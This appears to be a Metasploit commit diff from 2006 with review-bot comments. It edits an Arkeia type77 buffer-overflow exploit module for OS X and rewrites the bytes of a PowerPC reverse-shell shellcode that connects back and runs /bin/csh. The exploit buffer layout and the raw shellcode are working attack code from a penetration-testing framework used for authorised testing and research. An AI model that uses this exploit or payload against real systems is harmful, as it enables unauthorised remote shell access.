
Bug fix to msfencode when an invalid -e is specified

Small tweaks to type77, mostly for print_status and -find
Fixed busted payload port in shell_reverse_tcp


git-svn-id: file:///home/svn/incoming/trunk@3469 4d416f70-5f16-0410-b530-b9f4589650da
1 parent e01b5ae commit 04341837f75c6c6cf8f96730260aa1128a2730dd HD Moore committed Jan 29, 2006
Showing with 21 additions and 13 deletions.
  1. +7 −2 modules/exploits/osx/arkeia/type77.rb
  2. +13 −11 modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb
  3. +1 −0 msfencode
@@ -33,6 +33,10 @@ def initialize(info = {})
'Space' => 1000,
'BadChars' => "\x00",
'MinNops' => 700,
+ 'Compat' =>
+ {
+ 'ConnectionType' => '-find',
+ },
},
'Targets' =>
[
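Review bot: The `'Compat'` entry added with `'ConnectionType' => '-find'` is not explained anywhere in the hunk, and a restriction of this kind is exactly what a later maintainer will question when a payload is unexpectedly missing from the compatible list. A one-line comment above `'Compat'` giving the reason find-socket payloads are ruled out would be worth adding, for example `# Find-socket payloads are excluded here because: <reason>`; the hunk itself does not show the reason, so I cannot supply it. The enclosing `'Payload'` hash and the `initialize` call both start and end outside this hunk.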
@@ -81,16 +85,17 @@ def exploit
# getenv() before our function returns.
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
+ head[6, 2] = [1200].pack('n')
+
buf = Rex::Text.rand_text_english(1200, payload_badchars)
# Return back to the stack either directly or via system lib
buf[0, 112] = [target.ret].pack('N') * (112/4)
# Huge nop slep followed by the payload
buf[112, payload.encoded.length] = payload.encoded
-
- head[6, 2] = [buf.length].pack('n')
+ print_status("Sending request...")
begin
sock.put(head)
sock.put(buf)
@@ -30,17 +30,19 @@ def initialize(info = {})
'LPORT' => [ 34, 'n' ],
'LHOST' => [ 36, 'ADDR' ],
},
- 'Payload' =>
- "\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00\x61" +
- "\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00\x00\x0d" +
- "\x00\x02\x10\xe1\x7c\x88\x02\xa6\x38\xa0\x00\x10\x38\x00\x00\x62" +
- "\x7f\xc3\xf3\x78\x44\x00\x00\x02\x7c\x00\x02\x78\x38\xa0\x00\x02" +
- "\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00\x02" +
- "\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82\xff\xe5" +
- "\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\xa5\x2a\x79" +
- "\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x20\x90\x61\xff\xf8" +
- "\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00\x3b\x7c\x00\x04\xac" +
- "\x44\x00\x00\x02\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x41\x41\x41"
+ 'Payload' =>
+ "\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00" +
+ "\x00\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78" +
+ "\x48\x00\x00\x0d\x00\x02\x22\x11\x7f\x00\x00\x01\x7c\x88" +
+ "\x02\xa6\x38\xa0\x00\x10\x38\x00\x00\x62\x7f\xc3\xf3\x78" +
+ "\x44\x00\x00\x02\x7c\x00\x02\x78\x38\xa0\x00\x02\x38\x00" +
+ "\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00\x02" +
+ "\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82" +
+ "\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78" +
+ "\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63" +
+ "\x00\x20\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8" +
+ "\x38\x00\x00\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x2f\x62" +
+ "\x69\x6e\x2f\x63\x73\x68\x00\x41\x41\x41"
}
))
end
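Review bot: The `'Offsets'` table in the context lines (`'LPORT' => [ 34, 'n' ]`, `'LHOST' => [ 36, 'ADDR' ]`) is only correct because the new bytes `\x00\x02\x22\x11\x7f\x00\x00\x01` land at offsets 32–39 of the payload string, and the preceding `\x48\x00\x00\x0d` (which appears to be a `bl` skipping 12 bytes forward to the `\x7c\x88\x02\xa6` that follows) depends on that embedded structure being exactly 8 bytes long. None of this is written down, and the removed lines show how easily the byte string and the offset table drift apart, since the old 4-byte structure left `LHOST` patching over the following instruction. I would add a comment above `'Payload'` such as `# Bytes 32..39 are the embedded sockaddr (presumably len, family, port, addr); the LPORT/LHOST offsets above and the preceding branch assume it is exactly 8 bytes — keep them in sync.` The enclosing `initialize` call opens outside the hunk.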
@@ -141,6 +141,7 @@ case cmd
buf = input.readlines.join
encoders.each { |enc|
+ next if not enc
begin
# Imports options
enc.datastore.import_options_from_s(options)

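Review bot: `next if not enc` silently drops a nil entry, so a user who mistyped the encoder name given with `-e` gets no indication that the choice was ignored and the remaining encoders run as if nothing happened. Since `enc` is already nil at this point the bad name is no longer available here, so the place to report it is where `encoders` is built, which is outside this hunk; at minimum a comment such as `# nil entries come from unresolved -e names; reported upstream` would make the skip intentional rather than puzzling. Stylistically, Ruby idiom is `next unless enc` rather than `next if not enc`. The `encoders.each` block opens in the hunk but closes outside it, and the surrounding `case cmd` arm starts outside as well.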